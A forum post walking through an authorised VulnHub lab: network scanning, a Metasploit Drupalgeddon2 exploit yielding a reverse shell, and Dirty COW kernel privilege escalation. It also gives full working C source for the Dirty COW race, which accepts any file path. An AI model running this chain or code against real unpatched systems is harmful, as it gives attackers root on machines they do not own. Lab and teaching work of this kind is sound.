火影 posted on 2024-5-14 23:49:54

Reproducing the Linux Dirty COW (DirtyCow) privilege-escalation vulnerability

#Overview

Dirty COW (DirtyCow, CVE-2016-5195) is a local privilege-escalation vulnerability in the Linux kernel. It is caused by a race condition in the kernel's copy-on-write (COW) handling of private memory mappings: an unprivileged local user who wins the race can write into the page-cache copy of a file of which they hold only a private, read-only mapping. That is enough to overwrite read-only files such as /etc/passwd or setuid binaries and obtain root. The bug was fixed in October 2016 (Linux 4.8.3 and the corresponding stable and distribution kernels); a kernel older than those fixes, like the one on this target, can be exploited with the public exploit used below.
https://cdn.nlark.com/yuque/0/2024/webp/38483060/1710856894825-f1b9e41b-a997-4bd7-8795-a4a6d664d8fd.webp

#Setup

Target: VulnHub Lampiao, 192.168.230.217
https://cdn.nlark.com/yuque/0/2024/jpeg/38483060/1710856950710-b1137d79-014b-49dd-a8c0-34e25c2f354f.jpeg
Attacker: Kali, 192.168.230.128

#Reproduction steps

1. Scan the 192.168.230.0/24 subnet to find the target (a SYN scan, so nmap needs root on the attacker):
nmap -sS 192.168.230.0/24
https://cdn.nlark.com/yuque/0/2024/jpeg/38483060/1710856979594-e76cafb2-81ff-4e15-bfb3-3f6ac12fcd85.jpeg
2. The target is found at 192.168.230.217; next run a full port and service-version scan against it:
nmap -p 1-65535 -sV 192.168.230.217
https://cdn.nlark.com/yuque/0/2024/jpeg/38483060/1710857337517-a30dd3d3-0517-4658-90af-f29af904bdde.jpeg
3. Three open ports are found: 22, 80 and 1898. The page on port 80 gives nothing useful, so open port 1898 instead: http://192.168.230.217:1898
https://cdn.nlark.com/yuque/0/2024/jpeg/38483060/1710857482996-b7e2fe4f-64f2-4d49-a91c-f03a28943477.jpeg
This reaches a login page.
4. At the bottom of that page is the line Powered by Drupal.
https://cdn.nlark.com/yuque/0/2024/jpeg/38483060/1710857691189-c2fd3f92-75b8-475c-933d-a88b66a78b92.jpeg
A quick search shows that Drupal is a CMS written in PHP.
https://cdn.nlark.com/yuque/0/2024/jpeg/38483060/1710857730600-81b26e09-16de-4ec2-8b29-b01555f0d79e.jpeg
5. The Aliyun vulnerability database (阿里云漏洞库) lists Drupal's historical vulnerabilities.
https://cdn.nlark.com/yuque/0/2024/jpeg/38483060/1710857777545-0c065c4f-f515-415f-a5fc-29afd8f06d67.jpeg
Among them is the unauthenticated remote code execution vulnerability CVE-2018-7600 (Drupalgeddon2), shown below:
https://cdn.nlark.com/yuque/0/2024/jpeg/38483060/1710857979065-e1e48c1d-ca0e-4d12-9cf5-aa8ee3d475cc.jpeg
6. Search for the matching exploit module in msfconsole.
https://cdn.nlark.com/yuque/0/2024/jpeg/38483060/1710858050991-f040eeb2-d390-4115-9d23-f281364a4169.jpeg
7. Select entry 1 from the results and set the required options: RHOSTS, LHOST, LPORT and so on.
https://cdn.nlark.com/yuque/0/2024/jpeg/38483060/1710858093738-ea65d1ac-e50d-4bbd-bd21-6d177e54ec91.jpeg
8. Enter run to launch it. A reverse shell comes back, but getuid shows that the session only has the privileges of the web server's account, so we still need to escalate to root.
https://cdn.nlark.com/yuque/0/2024/jpeg/38483060/1710858149654-8c8d6640-a71d-422a-9a37-ab979e9c4287.jpeg
9. Open a new terminal, start an HTTP server with Python in the directory containing linux-exploit-suggester.sh, then download the script on the target with wget.
https://cdn.nlark.com/yuque/0/2024/jpeg/38483060/1710858616108-28ae3ac9-385d-4eea-a1f6-1215c920d0bb.jpeg
10. After adding execute permission with chmod +x, run the script.
https://cdn.nlark.com/yuque/0/2024/jpeg/38483060/1710859035336-5ec359ce-094c-48d2-bc9d-cccdc498f024.jpeg
11. The script's output reports that the kernel is vulnerable to the Dirty COW privilege escalation. Note that linux-exploit-suggester decides this from the kernel version string, and distributions backport fixes without changing that string, so this is a lead to be confirmed rather than proof; running the exploit in step 14 is the confirmation.
https://cdn.nlark.com/yuque/0/2024/jpeg/38483060/1710859122287-c67bd8cf-9a4b-454f-840f-0742c4c903bd.jpeg
12. Find the matching exploit on GitHub.
https://cdn.nlark.com/yuque/0/2024/jpeg/38483060/1710859197025-0c1518cc-f3be-4de7-8152-6888fb44fe93.jpeg
13. Transfer it to the target the same way as before.
https://cdn.nlark.com/yuque/0/2024/jpeg/38483060/1710859243739-ddaa6fd8-f2c6-495d-b83c-81c4c4c14971.jpeg
14. Unpack it, change into the exploit's directory and compile the .cpp file first (with make); only then can it be run.
https://cdn.nlark.com/yuque/0/2024/jpeg/38483060/1710859287962-5932e896-4b6e-4dda-9fb8-2cc1cd2c3fdf.jpeg
The run succeeds and prints the new root password: dirtyCowFun
https://cdn.nlark.com/yuque/0/2024/jpeg/38483060/1710859386643-6dd30dc1-8eab-4751-944a-9ff9543f6529.jpeg
Privilege escalation succeeded: the current user is root.
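To make the kernel-side mechanism concrete, here is an added, stand-alone C example. It is not code from this post and not the GitHub exploit used in step 14; it runs the Dirty COW race against a throw-away read-only file in /tmp instead of /etc/passwd. One thread keeps discarding the process's private copy of a page with madvise(MADV_DONTNEED) while another writes to the same address through /proc/self/mem. On a vulnerable kernel the write lands in the page cache and the file's content changes; on a patched kernel the write only ever hits the private COW copy and the file is unchanged. The temporary file name, the constructed passwd-style sample line, the payload and the iteration count are this example's own choices. Build with gcc -pthread.

```c
#define _GNU_SOURCE
#define _FILE_OFFSET_BITS 64
#include <fcntl.h>
#include <pthread.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>

/* State shared by the two racing threads. */
struct race {
    void *map;            /* private, read-only mapping of the target file */
    const char *payload;  /* bytes we try to force into the file */
    size_t len;
    long iterations;
};

/* Thread A: keep throwing away the private copy of the page. The next
 * access faults it back in from the page cache; that window is the bug. */
static void *madvise_thread(void *arg)
{
    struct race *r = arg;
    for (long i = 0; i < r->iterations; i++)
        madvise(r->map, 0x100, MADV_DONTNEED);
    return NULL;
}

/* Thread B: write to the mapping via /proc/self/mem. The kernel services
 * this with get_user_pages(FOLL_FORCE); on a vulnerable kernel the race
 * makes it write the page-cache page instead of a fresh COW copy. */
static void *write_thread(void *arg)
{
    struct race *r = arg;
    int fd = open("/proc/self/mem", O_RDWR);
    if (fd < 0)
        return NULL;
    for (long i = 0; i < r->iterations; i++) {
        lseek(fd, (off_t)(uintptr_t)r->map, SEEK_SET);
        if (write(fd, r->payload, r->len) < 0)
            break;
    }
    close(fd);
    return NULL;
}

/* Map `path` read-only and private, run the race, then re-read the file.
 * Returns 1 if the file now starts with `payload` (kernel vulnerable),
 * 0 if it is unchanged (kernel patched), -1 on a setup error. */
int dirtycow_attempt(const char *path, const char *payload, long iterations)
{
    struct stat st;
    size_t len = strlen(payload);
    int fd = open(path, O_RDONLY);
    if (fd < 0)
        return -1;
    if (fstat(fd, &st) < 0 || (size_t)st.st_size < len) { close(fd); return -1; }
    void *map = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, fd, 0);
    close(fd);
    if (map == MAP_FAILED)
        return -1;

    struct race r = { map, payload, len, iterations };
    pthread_t a, b;
    if (pthread_create(&a, NULL, madvise_thread, &r) != 0) { munmap(map, st.st_size); return -1; }
    if (pthread_create(&b, NULL, write_thread, &r) != 0) { pthread_join(a, NULL); munmap(map, st.st_size); return -1; }
    pthread_join(a, NULL);
    pthread_join(b, NULL);
    munmap(map, st.st_size);

    /* Read the file back through the page cache to see which side "won". */
    char buf[256];
    fd = open(path, O_RDONLY);
    if (fd < 0)
        return -1;
    ssize_t n = read(fd, buf, sizeof buf);
    close(fd);
    if (n < 0 || (size_t)n < len)
        return -1;
    return memcmp(buf, payload, len) == 0 ? 1 : 0;
}

/* Self-contained demo: race against a constructed, read-only passwd-style line
 * in a temp file (not the real /etc/passwd). Same return values as above. */
int dirtycow_demo(long iterations)
{
    char path[] = "/tmp/dirtycow-demo-XXXXXX";                 /* hypothetical temp file */
    const char original[] = "root:x:0:0:root:/root:/bin/bash\n";  /* constructed sample line */
    const char payload[]  = "r00t:x:0:0:root:/root:/bin/bash\n";  /* same length, changed user */
    int fd = mkstemp(path);
    if (fd < 0)
        return -1;
    if (write(fd, original, sizeof original - 1) != (ssize_t)(sizeof original - 1)) { close(fd); unlink(path); return -1; }
    fchmod(fd, 0444);  /* read-only, as /etc/passwd is for an unprivileged user */
    close(fd);
    int rc = dirtycow_attempt(path, payload, iterations);
    unlink(path);
    return rc;
}

int main(void)
{
    int rc = dirtycow_demo(200000);
    if (rc == 1)      puts("file modified: kernel is vulnerable to Dirty COW");
    else if (rc == 0) puts("file unchanged: kernel is patched");
    else              puts("setup failed");
    return rc < 0;
}
```

Two caveats a practitioner should keep in mind. First, the write lands in the page cache without the page being marked dirty, so on a vulnerable kernel the change can vanish once that page is evicted; the public exploits therefore act on /etc/passwd and expect the new password to be used immediately. Second, those exploits normally save a copy of the original /etc/passwd under /tmp and tell you so in their output; restore it when the exercise is over, since a rewritten root entry is the kind of change that breaks a box later.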
